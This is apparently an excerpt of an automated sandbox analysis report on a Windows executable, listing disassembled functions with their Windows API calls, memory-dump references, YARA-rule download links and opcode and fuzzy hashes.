Instruction Fuzzy Hash: 2231C071A00219EFCB04CFACCD99ADE3FB5EB45315F108669FA21A72D1C7709945DB90

Function 00B35706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B35745
SendMessageW.USER32(?,00001074,?,00000001), ref: 00B3579D
_wcslen.LIBCMT ref: 00B357AF
_wcslen.LIBCMT ref: 00B357BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B35816

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 4710f3a895467bb966cf1ddeb9389c26deb780db20c2c186fd2ee5ed3ef70ae9
Instruction ID: 66875b469e4780e3f7782e4d46ac7cd28a65b5b9b632d92b3cc860349ffdd4eb
Opcode Fuzzy Hash: 4710f3a895467bb966cf1ddeb9389c26deb780db20c2c186fd2ee5ed3ef70ae9
Instruction Fuzzy Hash: 55216575904618DADB309FA4DC85AED7BF8FF04724F208296E929EB2C4D7709985CF50

Function 00B20930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00B20951
GetForegroundWindow.USER32 ref: 00B20968
GetDC.USER32(00000000), ref: 00B209A4
GetPixel.GDI32(00000000,?,00000003), ref: 00B209B0
ReleaseDC.USER32(00000000,00000003), ref: 00B209E8

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 5b7ffe03b2465619dbfa738b03c369bab33f021ac9da27bb25ca67a49ea7e7d8
Instruction ID: fbefa2ab662b00351e0263bc8ff62bfbd95d5dc4f83b5c1dbd2a4ca8c5ed6c4a
Opcode Fuzzy Hash: 5b7ffe03b2465619dbfa738b03c369bab33f021ac9da27bb25ca67a49ea7e7d8
Instruction Fuzzy Hash: 0B219635600214AFD704EFA9D985A9EBBF5EF49700F148468F84AE7762CB30EC44CB50

Function 00ADCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00ADCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ADCDE9

Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00ADCE0F
_free.LIBCMT ref: 00ADCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ADCE31

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: df4ab27a62c8ef8a9c172a060d04f5162545e9051478e2e4a513a0260fe56c89
Instruction ID: 780b3add48663028d4156d4b469affb18eed32ff39e2b15d8dcd8afcdcb705c9
Opcode Fuzzy Hash: df4ab27a62c8ef8a9c172a060d04f5162545e9051478e2e4a513a0260fe56c89
Instruction Fuzzy Hash: B10175B26016167F672117BA6C48D7FBE6DEEC6BB1365012AF906D7301EE618D01D2B0

Function 00AB9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB9693
SelectObject.GDI32(?,00000000), ref: 00AB96A2
BeginPath.GDI32(?), ref: 00AB96B9
SelectObject.GDI32(?,00000000), ref: 00AB96E2

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 4e94147e625b4881742c937bc6f1e5ab280f5de0b8f709f0d68e1d4f61b2d56a
Instruction ID: b2708fd143ff2b435a4286620f2ab2284bb2e88d75b7a971d7cf876d4e1a6b3b
Opcode Fuzzy Hash: 4e94147e625b4881742c937bc6f1e5ab280f5de0b8f709f0d68e1d4f61b2d56a
Instruction Fuzzy Hash: E3217F31802305EBDB119F6CDC29BEE7BB8BB10315F100616F619A71B2DB705893CBA0

Function 00AB990E Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00AB98CC
SetTextColor.GDI32(?,?), ref: 00AB98D6
SetBkMode.GDI32(?,00000001), ref: 00AB98E9
GetStockObject.GDI32(00000005), ref: 00AB98F1
GetWindowLongW.USER32(?,000000EB), ref: 00AB9952

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: 4308b22a024f02154323d69ca5f3e05c640e3debfa5969d1b5655c41c23cab7f
Instruction ID: c0caf4516d51bef4544a0e8878768d0a789a328dcefab351536017d8a3383a18
Opcode Fuzzy Hash: 4308b22a024f02154323d69ca5f3e05c640e3debfa5969d1b5655c41c23cab7f
Instruction Fuzzy Hash: E111C832146250AFCB128FA5EC5AEEF3F78EB127117140559F642AB5B3CB254991CB50

Function 00B05711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00B05726
_memcmp.LIBVCRUNTIME ref: 00B05744
_memcmp.LIBVCRUNTIME ref: 00B05757
_memcmp.LIBVCRUNTIME ref: 00B0576F
_memcmp.LIBVCRUNTIME ref: 00B05787

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f0fbc94c84a3734daa93cd540428509f4e84a93067815a17c7e37d5c86f415fd
Instruction ID: 87bae541a8ebc7637d4a5f31b36627881209ab9ec1b12b4a5a6d738730a52d2d
Opcode Fuzzy Hash: f0fbc94c84a3734daa93cd540428509f4e84a93067815a17c7e37d5c86f415fd
Instruction Fuzzy Hash: 0701B9B5781605BBD72855109F82FBB77DCEF21398F504064FD049EAC2F760ED1096A1

Function 00AD2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00ACF2DE,00AD3863,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6), ref: 00AD2DFD
_free.LIBCMT ref: 00AD2E32
_free.LIBCMT ref: 00AD2E59
SetLastError.KERNEL32(00000000,00AA1129), ref: 00AD2E66
SetLastError.KERNEL32(00000000,00AA1129), ref: 00AD2E6F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 6ff828ac6400802e9f15e6283322cbbabd10ac7bb289932dd5e5a6d3e1c428a9
Instruction ID: 4a873a25afaffa9ac63104b05ff901ae621a273e1840b2b9573aeaca78779587
Opcode Fuzzy Hash: 6ff828ac6400802e9f15e6283322cbbabd10ac7bb289932dd5e5a6d3e1c428a9
Instruction Fuzzy Hash: 0C01D1366056006B872227756D45F2B3F69ABF13A2B34442BF837A33D2EEB48801C320

Function 00B0000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?,?,00B0035E), ref: 00B0002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?), ref: 00B00064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00070

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: c016179a1144cd78d640625da959e6f06c7534a1668aec7cc22abde97fc01f2d
Instruction ID: d3a6a4bc0615d47e2d44f304dfdd2e17540f9929222137d3eef90a1755d06f40
Opcode Fuzzy Hash: c016179a1144cd78d640625da959e6f06c7534a1668aec7cc22abde97fc01f2d
Instruction Fuzzy Hash: BE01A276610208BFDB115FA8DC48BAE7EEDEF44751F248164F905E3250EB71DE408BA0

Function 00B0E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00B0E997
QueryPerformanceFrequency.KERNEL32(?), ref: 00B0E9A5
Sleep.KERNEL32(00000000), ref: 00B0E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 00B0E9B7
Sleep.KERNEL32 ref: 00B0E9F3

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 639467a793eff54dcff6f2137b3f0bc9ab832519d36d9d190d6ea1b199c6c9af
Instruction ID: 4b11a12d4bd0cb563405a2a3524470e6305aa1515887d60a9929813a957728ab
Opcode Fuzzy Hash: 639467a793eff54dcff6f2137b3f0bc9ab832519d36d9d190d6ea1b199c6c9af
Instruction Fuzzy Hash: 4A011731C01A29DBCF00ABE5DD59AEDBFB8FB09701F100996E512B2291CF309654DBA1

Function 00B010F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B01114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B0112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B0114D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 87c662245a051cb078a1a5602809ce1cd84daf1fafa677aa46f8ffa075d592a6
Instruction ID: 1771060a834e1b86af07300fcfd135225a71c7b6266757d47b3247147b4ec232
Opcode Fuzzy Hash: 87c662245a051cb078a1a5602809ce1cd84daf1fafa677aa46f8ffa075d592a6
Instruction Fuzzy Hash: 45011979200615FFDB154FA9DC49A6A3FAEEF893A0B204459FA45E73A0DE31DC009B60

Function 00B00FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B00FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B00FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B00FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B00FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B01002

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 857c5f7680773c4d9e13ebe345748454a2469bc80579a48e5086d94e3ff1a02a
Instruction ID: 4ab8a7ab56a51bd17df94bdefefcd5c6a5594f806dbfb128eb91ade97e0ee0cf
Opcode Fuzzy Hash: 857c5f7680773c4d9e13ebe345748454a2469bc80579a48e5086d94e3ff1a02a
Instruction Fuzzy Hash: 37F04939200301BBDB264FA89C49F5A3FADEF89762F204854FA85E7291DE70DC508B60

Function 00B01014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B0102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B01036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B0104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01062

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 08bb8aa7c873bb9854415df66526cfde67cde419e0fde532cf847aed6fc3e649
Instruction ID: 035601ad5c0324475d5dddc260bb1325bfbead68cabaf4d2844b1e1ed01c305c
Opcode Fuzzy Hash: 08bb8aa7c873bb9854415df66526cfde67cde419e0fde532cf847aed6fc3e649
Instruction Fuzzy Hash: 29F04939200301BFDB255FA8EC49F5A3FADEF89761F200814FA85E7290DE70D8508B60

Function 00B1030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10324
CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10331
CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B1033E
CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B1034B
CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10358
CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10365

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c39bbd742e3ae23b1bf95113c1bb4ecac39c3d3c45b65a00d675c0f45b8f4512
Instruction ID: 755911c0ae0b95c671ff4a2ab7f0f24ecc9145cfdcabaf408a538f302853cf6f
Opcode Fuzzy Hash: c39bbd742e3ae23b1bf95113c1bb4ecac39c3d3c45b65a00d675c0f45b8f4512
Instruction Fuzzy Hash: E201EE72800B019FCB30AF66E880842FBF9FF643053148A3FD1A252930C3B0A999CF84

Function 00ADD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00ADD752

Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0

_free.LIBCMT ref: 00ADD764
_free.LIBCMT ref: 00ADD776
_free.LIBCMT ref: 00ADD788
_free.LIBCMT ref: 00ADD79A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66ab9a0cfb7402804fd95cd45db0dfa22f41c7409606008875abadeb1b58bbdb
Instruction ID: 5e2360da156aa8fe7c8cb22b05ce717c8d25e723b2d966f529ca27d725ae0947
Opcode Fuzzy Hash: 66ab9a0cfb7402804fd95cd45db0dfa22f41c7409606008875abadeb1b58bbdb
Instruction Fuzzy Hash: D5F03632544204AB8625EB64FAC5D267BDDBB94750B940C47F09EE7781CB74FC80CB64

Function 00B05C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00B05C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00B05C6F
MessageBeep.USER32(00000000), ref: 00B05C87
KillTimer.USER32(?,0000040A), ref: 00B05CA3
EndDialog.USER32(?,00000001), ref: 00B05CBD

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5120f64f02baf92bd14eeba76f555408d0eed5e682d497b10f36ed77d5376cd4
Instruction ID: f56ff2cfecac37cd53b6cf10396f1a066f08578c0f1d9861d8dbaf757d9b7dc0
Opcode Fuzzy Hash: 5120f64f02baf92bd14eeba76f555408d0eed5e682d497b10f36ed77d5376cd4
Instruction Fuzzy Hash: 9801FB31500B04ABFB315B50DE8EFAA7FA8EB04B45F141599A582A24E1DBB4A9848F90

Function 00AD22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00AD22BE

Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0

_free.LIBCMT ref: 00AD22D0
_free.LIBCMT ref: 00AD22E3
_free.LIBCMT ref: 00AD22F4
_free.LIBCMT ref: 00AD2305

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9ea776ef7fbcaa4476fe2890f9b55b3d590e652b4b784a63a64de2241f9f34fd
Instruction ID: 2ac0a475e415e6c523e48abe5af8690c76f95dda51972fe1eb95c8fb842db39b
Opcode Fuzzy Hash: 9ea776ef7fbcaa4476fe2890f9b55b3d590e652b4b784a63a64de2241f9f34fd
Instruction Fuzzy Hash: C8F03AB18101208F8622BF68BD11A683FA4B778760700094BF41AD73B2CF740891FBA4

